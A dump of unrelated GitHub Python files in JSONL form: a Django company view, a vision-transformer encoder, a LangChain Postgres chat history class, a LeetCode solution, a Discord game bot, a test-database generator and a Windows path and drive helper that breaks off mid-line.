\"sparse_categorical_crossentropy\"\n","repo_name":"NicholasRasi/FL-Simulator","sub_path":"fl_sim/dataset/datasets/emnist.py","file_name":"emnist.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10405158632","text":"from datetime import timedelta\n\nfrom ..forms.exercise import *\nfrom ..models.company_assessment import *\nfrom ..forms.company import *\nfrom ..models.company import *\nfrom ..views.common import *\nimport requests\n\n\ndef company(request):\n\tif request.user.user_type.name.lower() != \"technical\":\n\t\treturn redirect(\"company_assessment_redirect\")\n\telse:\n\t\treturn render(request, 'company/company.html')\n\ndef create_dialog(request):\n\treturn render(request, 'company/dialogs/create_dialog.html')\n\ndef read(request):\n\ttry:\n\t\tdata \t\t\t\t = req_data(request,True)\n\t\tfilters \t\t\t = {}\n\t\tfilters['is_active'] = True\n\t\tfilters['company'] \t = data['company']\n\n\t\tname_search \t \t = data.pop(\"name\",\"\")\n\n\t\texclude = data.pop(\"exclude\",None)\n\t\t# has_transaction = data.get(\"transaction_type\",None)\n\t\t# if has_transaction:\n\t\t# \tfilters['transaction_type'] = has_transaction\n\n\t\tif name_search:\n\t\t\tfilters['name__icontains'] = name_search\n\n\t\tpagination = None\n\n\t\tif 'pagination' in data:\n\t\t\tpagination = data.pop(\"pagination\",None)\n\t\trecords = Company_rename.objects.filter(**filters).order_by(\"id\")\n\t\tresults = {'data':[]}\n\t\tresults['total_records'] = records.count()\n\n\t\tif pagination:\n\t\t\tresults.update(generate_pagination(pagination,records))\n\t\t\trecords = records[results['starting']:results['ending']]\n\t\tdatus = []\n\t\tfor record in records:\n\t\t\tcompany_transaction_type = []\n\t\t\trow = record.get_dict()\n\n\t\t\tif record.transaction_type:\n\t\t\t\tif not exclude:\n\t\t\t\t\tfor t_types in record.transaction_type:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tt_type = Exercise.objects.get(id=t_types, is_active=True, company=data['company'])\n\t\t\t\t\t\texcept Exercise.DoesNotExist:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\ttransaction_type_dict = {\n\t\t\t\t\t\t\t\t\t\t\t\t'id'\t\t: t_type.pk,\n\t\t\t\t\t\t\t\t\t\t\t\t'name'\t\t: t_type.name,\n\t\t\t\t\t\t\t\t\t\t\t\t'is_active' : t_type.is_active,\n\t\t\t\t\t\t\t\t\t\t\t\t'code'\t\t: t_type.transaction_code,\n\t\t\t\t\t\t\t\t\t\t\t\t'set_no'\t: t_type.set_no,\n\t\t\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\tcompany_transaction_type.append(transaction_type_dict)\n\t\t\trow['transaction_type'] = company_transaction_type\n\t\t\tdatus.append(row)\n\t\tresults['data'] = datus\n\t\treturn success_list(results,False)\n\texcept Exception as e:\n\t\treturn HttpResponse(e, status = 400)\n\n\ndef create(request):\n\ttry: \n\t\tpostdata = req_data(request,True)\n\t\tt_term \t = \"Transaction Type\"\n\t\tc_term \t = \"Company\"\n\t\tterms \t = get_display_terms(request)\n\n\t\tif terms:\n\t\t\tif terms.transaction_types:\n\t\t\t\tt_term = terms.transaction_types\n\n\t\t\tif terms.company_rename:\n\t\t\t\tc_term = terms.company_rename\n\t\tif 'updated_transaction_types' not in postdata or not postdata['updated_transaction_types']:\n\t\t\treturn error(\"%s is required.\"%(t_term))\n\n\t\ttransaction_types = postdata.pop('updated_transaction_types',[])\n\t\t\n\t\tcompany_transaction_type = []\n\t\tfor transaction_type in transaction_types:\n\t\t\tcompany_transaction_type.append(transaction_type)\n\n\t\tpostdata['transaction_type'] = list_to_string(company_transaction_type)\n\t\thours = postdata.get(\"hours\", 0)\n\n\t\tpostdata[\"hours\"] = timedelta(hours=hours, minutes=0) \n\t\ttry:\n\t\t\tinstance = Company_rename.objects.get(id=postdata.get('id',None))\n\t\t\tcompany = Company_rename_form(postdata, instance=instance)\n\t\texcept Company_rename.DoesNotExist:\n\t\t\tif not Company_rename.objects.filter(name=postdata['name']).exists():\n\t\t\t\tcompany = Company_rename_form(postdata)\n\t\t\telse: return error(\"%s already exists.\"%(c_term))\n\n\t\tif company.is_valid():\n\t\t\tcompany.save()\n\t\t\treturn HttpResponse(\"Successfully saved.\", status = 200)\n\t\telse:\n\t\t\treturn HttpResponse(company.errors, status = 400)\n\texcept Exception as err:\n\t\treturn HttpResponse(err, status = 400)\n\n\ndef delete(request, id=None):\n\ttry:\n\t\tc_term = \"Company\"\n\t\tterms = get_display_terms(request)\n\t\tif terms:\n\t\t\tif terms.company_rename:\n\t\t\t\tc_term = terms.company_rename\n\t\thas_record = Company_assessment.objects.filter(company_rename=id,is_active=True).first()\n\t\tif has_record:\n\t\t\traise_error(\"This %s is currently in use.\"%(c_term))\n\t\ttry:\n\t\t\trecord = Company_rename.objects.get(pk = id)\n\t\t\trecord.is_active = False\n\t\t\trecord.save()\n\t\t\treturn success(\"Successfully deleted.\")\n\t\texcept Company_rename.DoesNotExist:\n\t\t\traise_error(\"Company doesn't exist.\")\n\texcept Exception as e:\n\t\treturn HttpResponse(e, status = 400)\n\n\ndef get_intelex_subjects(request):\n\ttry:\n\t\tdatus \t\t\t= req_data(request,True)\n\t\turl \t\t\t= 'http://35.185.70.123/api/read_programs/'\n\t\theaders \t\t= {'content-type': 'application/json'}\n\t\tdata \t\t\t= {'complete_detail': True}\n\t\tresult \t\t\t= requests.post(url,data=json.dumps(data),headers=headers)\n\t\tresult.encoding = 'ISO-8859-1'\n\t\trecords \t\t= result.json()\n\n\t\tfor record in records['records']:\n\t\t\thas_exists = Company_rename.objects.filter(name__iexact=record['name'],program_id=record['id'],is_active=True,company=datus['company']).first()\n\t\t\tif has_exists:\n\t\t\t\tt_type \t\t\t = has_exists.transaction_type\n\t\t\t\ttransaction_types = Exercise.objects.filter(program_id=record['id'], is_active=True, is_intelex=True)\n\n\t\t\t\tfor transaction_type in transaction_types:\n\t\t\t\t\tif transaction_type.pk not in t_type:\n\t\t\t\t\t\tt_type.append(transaction_type.pk)\n\n\t\t\t\tt_types \t\t\t\t\t= dict()\n\t\t\t\tt_types['program_id'] \t\t= record['id']\n\t\t\t\tt_types['is_active'] \t\t= True\n\t\t\t\tt_types['is_intelex'] \t\t= True\n\t\t\t\tt_types['company'] \t\t\t= datus['company']\n\t\t\t\tt_types['name'] \t\t\t= record['name']\n\t\t\t\tt_types['transaction_type'] = list_to_string(t_type)\n\n\t\t\t\tcompany_rename_form = Company_rename_form(t_types,instance=has_exists)\n\n\t\t\t\tif company_rename_form.is_valid():\n\t\t\t\t\tcompany_rename_form.save()\n\t\t\t\telse:\n\t\t\t\t\treturn HttpResponse(company_rename_form.errors, status = 400)\n\t\t\telse:\n\t\t\t\tprogram \t\t\t = {}\n\t\t\t\tprogram['program_id'] = record['id']\n\t\t\t\tprogram['is_active'] = True\n\t\t\t\tprogram['is_intelex'] = True\n\t\t\t\tprogram['company'] \t = datus['company']\n\t\t\t\tprogram['name'] \t = record['name']\n\n\t\t\t\ttransaction_types \t = Exercise.objects.filter(program_id=record['id'], is_active=True, is_intelex=True)\n\t\t\t\ttransaction_typesArr = []\n\t\t\t\tfor transaction_type in transaction_types:\n\t\t\t\t\ttransaction_typesArr.append(transaction_type.pk)\n\n\t\t\t\tprogram['transaction_type'] = list_to_string(transaction_typesArr)\n\n\t\t\t\tcompany_rename_form = Company_rename_form(program)\n\n\t\t\t\tif company_rename_form.is_valid():\n\t\t\t\t\tcompany_rename_form.save()\n\t\t\t\telse:\n\t\t\t\t\treturn HttpResponse(company_rename_form.errors, status = 400)\n\t\treturn HttpResponse(\"Successfully saved.\", status = 200)\n\texcept Exception as e:\n\t\treturn HttpResponse(e,status=400)\n","repo_name":"it3r4-palamine/tabulation","sub_path":"web_admin/views/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12392721529","text":"## This code is from the Transformers co-class of DLStudio:\n\n## https://engineering.purdue.edu/kak/distDLS/\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nclass MasterEncoder(nn.Module):\n def __init__(self, max_seq_length, embedding_size, how_many_basic_encoders, num_atten_heads):\n super().__init__()\n self.max_seq_length = max_seq_length\n self.basic_encoder_arr = nn.ModuleList([BasicEncoder(\n max_seq_length, embedding_size, num_atten_heads) for _ in range(how_many_basic_encoders)]) # (A)\n\n def forward(self, sentence_tensor):\n out_tensor = sentence_tensor\n for i in range(len(self.basic_encoder_arr)): # (B)\n out_tensor = self.basic_encoder_arr[i](out_tensor)\n return out_tensor\n\n\nclass BasicEncoder(nn.Module):\n def __init__(self, max_seq_length, embedding_size, num_atten_heads):\n super().__init__()\n self.max_seq_length = max_seq_length\n self.embedding_size = embedding_size\n self.qkv_size = self.embedding_size // num_atten_heads\n self.num_atten_heads = num_atten_heads\n self.self_attention_layer = SelfAttention(\n max_seq_length, embedding_size, num_atten_heads) # (A)\n self.norm1 = nn.LayerNorm(self.embedding_size) # (C)\n self.W1 = nn.Linear(self.max_seq_length * self.embedding_size,\n self.max_seq_length * 2 * self.embedding_size)\n self.W2 = nn.Linear(self.max_seq_length * 2 * self.embedding_size,\n self.max_seq_length * self.embedding_size)\n self.norm2 = nn.LayerNorm(self.embedding_size) # (E)\n\n def forward(self, sentence_tensor):\n input_for_self_atten = sentence_tensor.float()\n normed_input_self_atten = self.norm1(input_for_self_atten)\n output_self_atten = self.self_attention_layer(\n normed_input_self_atten).to(device) # (F)\n input_for_FFN = output_self_atten + input_for_self_atten\n normed_input_FFN = self.norm2(input_for_FFN) # (I)\n basic_encoder_out = nn.ReLU()(\n self.W1(normed_input_FFN.view(sentence_tensor.shape[0], -1))) # (K)\n basic_encoder_out = self.W2(basic_encoder_out) # (L)\n basic_encoder_out = basic_encoder_out.view(\n sentence_tensor.shape[0], self.max_seq_length, self.embedding_size)\n basic_encoder_out = basic_encoder_out + input_for_FFN\n return basic_encoder_out\n\n#################################### Self Attention Code TransformerPreLN ###########################################\n\nclass SelfAttention(nn.Module):\n def __init__(self, max_seq_length, embedding_size, num_atten_heads):\n super().__init__()\n self.max_seq_length = max_seq_length\n self.embedding_size = embedding_size\n self.num_atten_heads = num_atten_heads\n self.qkv_size = self.embedding_size // num_atten_heads\n self.attention_heads_arr = nn.ModuleList([AttentionHead(self.max_seq_length,\n self.qkv_size) for _ in range(num_atten_heads)]) # (A)\n\n def forward(self, sentence_tensor): # (B)\n concat_out_from_atten_heads = torch.zeros(sentence_tensor.shape[0], self.max_seq_length,\n self.num_atten_heads * self.qkv_size).float()\n for i in range(self.num_atten_heads): # (C)\n sentence_tensor_portion = sentence_tensor[:,\n :, i * self.qkv_size: (i+1) * self.qkv_size]\n concat_out_from_atten_heads[:, :, i * self.qkv_size: (i+1) * self.qkv_size] = \\\n self.attention_heads_arr[i](sentence_tensor_portion) # (D)\n return concat_out_from_atten_heads\n\n\nclass AttentionHead(nn.Module):\n def __init__(self, max_seq_length, qkv_size):\n super().__init__()\n self.qkv_size = qkv_size\n self.max_seq_length = max_seq_length\n self.WQ = nn.Linear(max_seq_length * self.qkv_size,\n max_seq_length * self.qkv_size) # (B)\n self.WK = nn.Linear(max_seq_length * self.qkv_size,\n max_seq_length * self.qkv_size) # (C)\n self.WV = nn.Linear(max_seq_length * self.qkv_size,\n max_seq_length * self.qkv_size) # (D)\n self.softmax = nn.Softmax(dim=1) # (E)\n\n def forward(self, sentence_portion): # (F)\n Q = self.WQ(sentence_portion.reshape(\n sentence_portion.shape[0], -1).float()).to(device) # (G)\n K = self.WK(sentence_portion.reshape(\n sentence_portion.shape[0], -1).float()).to(device) # (H)\n V = self.WV(sentence_portion.reshape(\n sentence_portion.shape[0], -1).float()).to(device) # (I)\n Q = Q.view(sentence_portion.shape[0],\n self.max_seq_length, self.qkv_size) # (J)\n K = K.view(sentence_portion.shape[0],\n self.max_seq_length, self.qkv_size) # (K)\n V = V.view(sentence_portion.shape[0],\n self.max_seq_length, self.qkv_size) # (L)\n A = K.transpose(2, 1) # (M)\n QK_dot_prod = Q @ A # (N)\n rowwise_softmax_normalizations = self.softmax(QK_dot_prod) # (O)\n Z = rowwise_softmax_normalizations @ V\n coeff = 1.0/torch.sqrt(torch.tensor([self.qkv_size]).float()).to(device) # (S)\n Z = coeff * Z # (T)\n return Z\n","repo_name":"Russolves/Vision-Transformer","sub_path":"ViTHelper.py","file_name":"ViTHelper.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29895432482","text":"import json\nimport logging\nfrom datetime import datetime\nfrom typing import Dict, List, Optional\nfrom uuid import UUID\n\nfrom fastapi_sqlalchemy import db\nfrom langchain.schema import (BaseChatMessageHistory, BaseMessage,\n _message_to_dict)\nfrom langchain.schema.messages import AIMessage, HumanMessage\n\nfrom models.chat_message import ChatMessage\n\nlogger = logging.getLogger(__name__)\n\n\nclass ChatMessageJSONEncoder(json.JSONEncoder):\n def default(self, obj: object):\n if isinstance(obj, UUID):\n # if the obj is uuid, we simply return the value of uuid\n return str(obj)\n if isinstance(obj, datetime):\n # for datetime objects, convert to string in your preferred format\n return obj.isoformat()\n return super().default(obj)\n\n\nclass PostgresChatMessageHistory(BaseChatMessageHistory):\n def __init__(\n self,\n sender_account_id: Optional[str],\n sender_user_id: Optional[str],\n # user: Optional[UserOutput],\n session_id: Optional[str],\n parent_id: Optional[str] = None,\n agent_id: Optional[str] = None,\n team_id: Optional[str] = None,\n sender_name: Optional[str] = None,\n chat_id: Optional[str] = None,\n run_id: Optional[UUID] = None,\n ):\n self.sender_account_id = sender_account_id\n self.sender_user_id = sender_user_id\n # self.user = user\n self.session_id = session_id\n self.parent_id = parent_id\n self.agent_id = agent_id\n self.team_id = team_id\n self.sender_name = sender_name\n self.chat_id = chat_id\n self.run_id = run_id\n\n @property\n def messages(self) -> List[BaseMessage]: # type: ignore\n \"\"\"Retrieve the messages from PostgreSQL\"\"\"\n return []\n\n def create_message(\n self,\n message,\n parent_id: Optional[str] = None,\n agent_id: Optional[UUID] = None,\n voice_url: Optional[str] = None,\n ):\n # Append the message to the record in PostgreSQL\n chat_message = ChatMessage(\n sender_user_id=self.sender_user_id,\n sender_account_id=self.sender_account_id,\n message=_message_to_dict(message),\n session_id=self.session_id,\n agent_id=self.agent_id or agent_id,\n team_id=self.team_id,\n parent_id=parent_id,\n sender_name=self.sender_name,\n chat_id=self.chat_id,\n run_id=self.run_id,\n voice_url=voice_url,\n )\n\n db.session.add(chat_message)\n db.session.commit()\n db.session.refresh(chat_message)\n\n # Serialize the model instance's data dictionary\n data_dict = chat_message.to_dict()\n if chat_message.parent:\n parent_dict = chat_message.parent.to_dict()\n data_dict[\"parent\"] = parent_dict\n\n data_json = json.dumps(\n data_dict, cls=ChatMessageJSONEncoder\n ) # Use default=str to handle UUID and datetime\n # print(\"the result\", json.loads(data_json))\n return json.loads(data_json)\n\n def create_ai_message(\n self,\n message: str,\n parent_id: Optional[str] = None,\n agent_id: Optional[str] = None,\n voice_url: Optional[str] = None,\n ):\n return self.create_message(\n AIMessage(content=message), parent_id, agent_id, voice_url\n )\n\n def create_human_message(self, message: str, voice_url: Optional[str] = None):\n return self.create_message(\n HumanMessage(\n content=message,\n additional_kwargs={\n \"name\": self.sender_name,\n },\n ),\n parent_id=self.parent_id,\n voice_url=voice_url,\n )\n\n def add_message(self, message: BaseMessage) -> str:\n \"\"\"Append the message to the record in PostgreSQL\"\"\"\n return \"\"\n\n def update_thoughts(self, message_id: str, thoughts: List[Dict]):\n chat_message: ChatMessage = db.session.query(ChatMessage).get(message_id)\n chat_message.thoughts = thoughts\n db.session.commit()\n\n updated_message_json = json.dumps(\n chat_message.to_dict(), cls=ChatMessageJSONEncoder\n )\n return json.loads(updated_message_json)\n\n def delete_message(self, message_id: str):\n chat_message: ChatMessage = db.session.query(ChatMessage).get(message_id)\n db.session.delete(chat_message)\n db.session.commit()\n\n def clear(self) -> None:\n \"\"\"Clear session memory from PostgreSQL\"\"\"\n return None\n\n def __del__(self) -> None:\n return None\n","repo_name":"l3vels/L3AGI","sub_path":"apps/server/postgres.py","file_name":"postgres.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"72"} +{"seq_id":"2868079821","text":"'''\r\nCreated on Oct 1, 2017\r\n\r\n@author: sista\r\n'''\r\n\r\n\r\nclass Solution(object):\r\n def findPairs(self, nums, k):\r\n \"\"\"\r\n :type nums: List[int]\r\n :type k: int\r\n :rtype: int\r\n \"\"\"\r\n #nums=[3,1,4,1,5]\r\n #k=2\r\n output=[]\r\n output1=[]\r\n output2=[]\r\n var=[]\r\n for i in range(len(nums)):\r\n for j in range(i):\r\n if(abs(nums[i]-nums[j]) == k):\r\n var.append(nums[i])\r\n var.append(nums[j])\r\n output.append(var)\r\n var=[]\r\n\r\n for i in output:\r\n if i not in output1:\r\n output1.append(i)\r\n \r\n for j in output1:\r\n if (j not in output2) and (j[::-1] not in output2):\r\n output2.append(j)\r\n \r\n return (len(output2))\r\n \r\n \r\nsol=Solution();\r\nnums=[3,1,4,1,5];\r\nk=2;\r\nprint(sol.findPairs(nums, k))\r\n\r\n","repo_name":"Hasanth-Sista/leetCode","sub_path":"532Python.py","file_name":"532Python.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40126823454","text":"import sqlite3\nfrom sqliteHelper import *\nimport discord\n\ndef createGame(ctx):\n db = sqlite3.connect('data.db')\n cur = db.cursor()\n\n #Creating the game db\n cur.execute('''CREATE TABLE IF NOT EXISTS game(player text, playerId integer, country text, wood integer, wheat integer, oil integer)''')\n db.commit()\n db.close()\n\n\ndef joinGame(ctx):\n db = sqlite3.connect('data.db')\n cur = db.cursor()\n #check if the player is already logged in\n for id in cur.execute('SELECT playerId FROM game'):\n if checkValues(ctx.author.id, id):\n return False\n break \n else:\n # Add player at the game\n cur.execute('''INSERT INTO game VALUES(?,?,?,?,?,?)''', [str(ctx.author.name), str(ctx.author.id), \"\", 500, 500, 500])\n db.commit()\n return True\n\nclass ChoosingView(discord.ui.View):\n @discord.ui.select(\n placeholder = \"Escolha um país para jogar!\", \n min_values = 1, \n max_values = 1, \n options = [ \n discord.SelectOption(\n label=\"Império do Sertão\",\n description=\"Clique aqui para governar o Império da Sertão\"\n ),\n discord.SelectOption(\n label=\"Império do Amazonas\",\n description=\"Clique aqui para governar o Império da Amazonas\"\n ),\n discord.SelectOption(\n label=\"Império Farroupilha\",\n description=\"Clique aqui para governar o Império da Farroupilha\"\n ),\n discord.SelectOption(\n label=\"Império Sudestino\",\n description=\"Clique aqui para governar o Império da Sudestino\"\n ),\n discord.SelectOption(\n label=\"Império da Mata\",\n description=\"Clique aqui para governar o Império da Mata\"\n )\n ]\n\n )\n async def select_callback(self, select, interaction): # the function called when the user is done selecting options\n db = sqlite3.connect('data.db')\n cur = db.cursor()\n #Define the forbidden countrys characters\n forbidden_characters = \"'()[],\"\n # List of countrys that are already selected\n countrys_already_selected = []\n # Fill the countrys_already_selected list\n for countrys in cur.execute('''SELECT country FROM game'''):\n newCountryName = str(countrys)\n for i in range(0, len(forbidden_characters)):\n newCountryName = newCountryName.replace(forbidden_characters[i], \"\")\n\n countrys_already_selected.append(str(newCountryName))\n # Check if the selected country are already selected\n if str(select.values[0]) in countrys_already_selected:\n await interaction.response.send_message(f\"O país {select.values[0]} já foi selecionado. Selecione outro, por favor.\")\n else:\n cur.execute(f'''UPDATE game SET country=? WHERE playerId=?''', [str(select.values[0]), interaction.user.id])\n db.commit()\n await interaction.response.send_message(f\"O país {select.values[0]} foi selecionado. Aproveite a partida!\")\n","repo_name":"Fibertero/LandRulerDiscordBot","sub_path":"game_manage.py","file_name":"game_manage.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72580676394","text":"## create clique db with same nodes as connection type (n**3 connections)\nFILE_PATH = \"tests/dbs/distinct_db.txt\"\nNODES = 200\n\n\nnodes = [f'Q{i}' for i in range(NODES)]\n\nwith open(FILE_PATH, 'w', encoding='utf-8') as output:\n n = 0\n end_constants = NODES/10\n for node in nodes:\n if n < end_constants:\n output.write(f'{node} constant:10\\n')\n else:\n output.write(f'{node}\\n')\n n += 1\n for node1 in nodes:\n for node2 in nodes:\n for node3 in nodes:\n output.write(f'{node1}->{node2} :{node3}\\n')\n\n","repo_name":"barisione-biso/MillenniumDB","sub_path":"scripts/distinct/distinct_db.py","file_name":"distinct_db.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38938591099","text":"__author__ = 'Holger Pandel'\n__copyright__ = \"Copyright 2013-2015, Holger Pandel\"\n__license__ = \"MIT\"\n__maintainer__ = \"Holger Pandel\"\n__email__ = \"holger.pandel@googlemail.com\"\n__status__ = \"Production\"\n\nimport base64\nimport ctypes\nimport itertools\nimport logging\nimport platform\nimport socket\nimport sys\nimport os\nimport re\nimport string\nfrom itertools import cycle\n\nif sys.platform.lower().startswith('win'):\n import winreg\n from msilib import *\n\nfrom datetime import datetime\nfrom binascii import hexlify, unhexlify\nfrom pathlib import PurePath, PurePosixPath, WindowsPath\n\nfrom PyQt5 import QtCore\n\nimport oPB\n\ntranslate = QtCore.QCoreApplication.translate\n\nclass LogMixin(object):\n \"\"\"\n Log mixin class\n\n Inherit from this class to access app-wide logger via\n\n self.logger\n\n from own class\n \"\"\"\n\n @property\n def logger(self):\n #name = '.'.join([__name__, self.__class__.__name__])\n name = '.'.join([self.__module__, self.__class__.__name__])\n return logging.getLogger(name)\n\n\nclass Helper():\n \"\"\"\n Simple tool functions\n\n Every method is defined as ``@classmethod``\n \"\"\"\n\n @classmethod\n def extCheck(cls, filename: str) -> bool:\n \"\"\"File extension check:\n Valid extension: ins, opsiscript, opsiinc\n\n Helper.extCheck(filename)\n\n Alternatives\n 1) ext = m.rpartition('.')[-1]; if ext == ...\n 2) m.lower().endswith(('.png', '.jpg', '.jpeg')) ....\n\n :param filename: filename to check\n \"\"\"\n\n if filename == \"\": return True\n\n value = filename.lower() # change everything to lower case\n ext = value.rpartition('.')[-1] # extract file extension, rpartition returns 3-tuple: part before the separator, the separator itself, and the part after the separator\n return False if not ext in oPB.SCRIPT_EXT else True\n\n @classmethod\n def concat_path_native(cls, path: str, file: str) -> str:\n \"\"\"\n Help function for connecting paths and filenames/foldernames.\n Takes underlying os into account.\n\n :param path: base path\n :param file: file or folder\n \"\"\"\n if platform.system() == \"Windows\": # if path is a ONLY windows drive, add a backslash to the drive letter\n if path[-1:] == \":\":\n path = path + \"\\\\\"\n value = str(PurePath(path, file))\n return value\n\n @classmethod\n def concat_path_posix(cls, path: str, file: str) -> str:\n \"\"\"\n Help function for connecting paths and filenames/foldernames.\n Only POSIX-complient paths.\n\n :param path: base path\n :param file: file or folder\n \"\"\"\n\n return str(PurePosixPath(path, file))\n\n @classmethod\n def get_file_from_path(cls, complete: str) -> str:\n \"\"\"\n Return file name from complete path as string\n\n :param complete: path incl. filename\n :return: filename\n \"\"\"\n\n return str(PurePath(complete).name)\n\n @classmethod\n def parse_text(cls, text: str) -> str:\n \"\"\"\n Replace individual @TABS and @ (cr+lf) templates within ``text``\n\n with HTML-based replacement (for QMessageBox messages)\n\n @TAB -> \"    \"\n @ -> \"
\"\n\n :param text: text with templates\n :return: display text\n \"\"\"\n\n text = text.replace(\"@TAB\", \"    \")\n text = text.replace(\"@\", \"
\")\n return text\n\n @classmethod\n def str_to_bool(cls, s: str) -> bool:\n \"\"\"\n Convert string to bool\n\n :param s: \"true\" / \"false\" as string\n :return: boolean expression\n \"\"\"\n\n print(\"str_to_bool called with value: \" + s)\n if s.upper() == 'TRUE':\n return True\n elif s.upper() == 'FALSE':\n return False\n else:\n raise ValueError(\"Cannot covert {} to a bool\".format(s))\n\n @classmethod\n def get_user(cls) -> str:\n \"\"\"Return current username, if found\"\"\"\n\n for name in ('LOGNAME', 'USER', 'LNAME', 'USERNAME'):\n user = os.environ.get(name)\n if user:\n return user\n # If not user from os.environ.get(), works only on UNIX\n #import pwd\n #return pwd.getpwuid(os.getuid())[0]\n\n @classmethod\n def encrypt(cls, text: str) -> str:\n \"\"\"\n Wrapper for Hexlify obfuscator\n\n Uses Helper.get_user() to obtain *cipher* key\n\n :param text: string to obfuscate\n :return: obfuscated string\n \"\"\"\n\n encrypted = (\n hexlify(\n Helper.Cipher.XORencrypt(Helper.get_user(), text)\n )\n )\n return encrypted.decode('utf-8')\n\n\n @classmethod\n def decrypt(cls, text: str) -> str:\n \"\"\"\n Wrapper for Hexlify obfuscator\n\n Uses Helper.get_user() to obtain *cipher* key\n\n :param text: obfuscated string\n :return: not obfuscated string\n \"\"\"\n\n decrypted = (\n Helper.Cipher.XORdecrypt(\n Helper.get_user(), unhexlify(text)\n )\n )\n return decrypted\n\n class Cipher:\n \"\"\"Cipher (wrapper) class\"\"\"\n\n @classmethod\n def XORencrypt(cls, key, plaintext):\n cyphered = ''.join(chr(ord(c) ^ ord(k)) for c, k in zip(plaintext, cycle(key)))\n return base64.b64encode(cyphered.encode())\n\n @classmethod\n def XORdecrypt(cls, key, ciphertext):\n message = ''.join(chr(c ^ ord(k)) for c, k in zip(base64.b64decode(ciphertext), cycle(key)))\n return message\n\n @classmethod\n def timestamp(cls) -> str:\n \"\"\"\n Small timestamp\n\n :return: timestamp string \"%Y%m%d-%H%M%S\"\n \"\"\"\n\n return datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n\n @classmethod\n def timestamp_changelog(cls) -> str:\n \"\"\"\n Long changelog timestamp\n\n :return: Mon, 27 Apr 2015 12:33:04 + 0100\n \"\"\"\n\n return datetime.now().strftime(\"%a, %d %b %Y %H:%M:%S +0000\")\n\n @classmethod\n def paramlist2list(cls, value) ->list:\n \"\"\"\n Converts comma-separated ``value``, to correct list format\n and takes into account, that the ``value`` itself could contain commas, but\n enclosed within \"...\", i. e.:\n\n \"OU=test1,dc=subdomain,dc=domain,dc=de\", \"OU=test2,dc=subdomain,dc=domain,dc=de\"\n -> these are two values, with commas inside the separate values\n\n Convert to rea list:\n [\"\\\"OU=Member Computers,dc=subdomain,dc=domain,dc=de\\\"\", \"\\\"OU=Member Computers2,dc=subdomain,dc=domain,dc=de\\\"\"]\n\n :param value: pseudo-list as string\n :return: correctly separated parameters as real list\n \"\"\"\n\n quot = 0\n quotpos = []\n retval = []\n sep = \"++@KOM@++\"\n\n # find all positions of , WITHIN \"...\", incl. \" char!\n\n for i in range(0, len(value) - 1, 1):\n if value[i] == chr(34):\n quot = 1 - quot # find opening/closing double quotes\n if (value[i] == chr(44)) and (quot == 0):\n quotpos.append(i) # find comma between quoted strings; i.e. quotpos=[0,4,12,56]\n\n # now separate string into list, exchange every comma OUTSIDE of \"...\" with ++@KOM@++\n # re-join the string and split it along the new separator, voilà!\n\n if len(quotpos) > 0:\n list_ = list(value)\n for pos in quotpos:\n list_[pos] = sep\n\n val = \"\".join(list_)\n\n retval = [x.strip() for x in val.split(sep)]\n\n return retval\n else:\n retval.append(value)\n return retval\n\n @classmethod\n def get_available_drive_letters(cls) -> list:\n \"\"\"\n Returns every non-mapped drive letter\n\n .. see: http://stackoverflow.com/questions/4188326/in-python-how-do-i-check-if-a-drive-exists-w-o-throwing-an-error-for-removable\n\n :return: list\n \"\"\"\n\n if 'Windows' not in platform.system():\n return []\n drive_bitmask = ctypes.cdll.kernel32.GetLogicalDrives()\n share_bitmask = sum([2**(ord(x)-65) for x in cls.get_persistent_netshare_drive_letters()])\n drive_bitmask |= share_bitmask\n return list(itertools.compress(string.ascii_uppercase,\n map(lambda x:x=='0', bin(drive_bitmask+2**26)[:1:-1])))\n\n @classmethod\n def get_existing_drive_letters(cls) -> list:\n \"\"\"\n Returns every mapped drive letter\n\n .. see: http://stackoverflow.com/questions/4188326/in-python-how-do-i-check-if-a-drive-exists-w-o-throwing-an-error-for-removable\n\n :return: list\n \"\"\"\n\n if 'Windows' not in platform.system():\n return []\n drive_bitmask = ctypes.cdll.kernel32.GetLogicalDrives()\n share_bitmask = sum([2**(ord(x)-65) for x in cls.get_netconnection_drive_letters()])\n drive_bitmask |= share_bitmask\n return list(itertools.compress(string.ascii_uppercase,\n map(lambda x:x=='1', bin(drive_bitmask+2**26)[:1:-1])))\n\n @classmethod\n def get_persistent_netshare_drive_letters(cls) -> list:\n \"\"\"\n Return every persistent netshare driver letter -> includes disconnected ones\n\n :return: list\n \"\"\"\n if 'Windows' not in platform.system():\n return []\n import winreg\n try: # key Network must not exists\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, \"Network\") as key:\n info = winreg.QueryInfoKey(key)\n return [winreg.EnumKey(key, i).upper() for i in range(info[0])]\n except:\n return []\n\n @classmethod\n def get_netconnection_drive_letters(cls) -> list:\n \"\"\"\n Return every remembered netshare driver letter -> includes disconnected ones\n\n :return: list\n \"\"\"\n WNetOpenEnum = ctypes.cdll.MPR.WNetOpenEnumA # https://docs.microsoft.com/en-us/windows/win32/api/winnetwk/nf-winnetwk-wnetopenenuma\n WNetCloseEnum = ctypes.cdll.MPR.WNetCloseEnum # https://docs.microsoft.com/en-us/windows/win32/api/winnetwk/nf-winnetwk-wnetcloseenum\n WNetEnumResource = ctypes.cdll.MPR.WNetEnumResourceA # 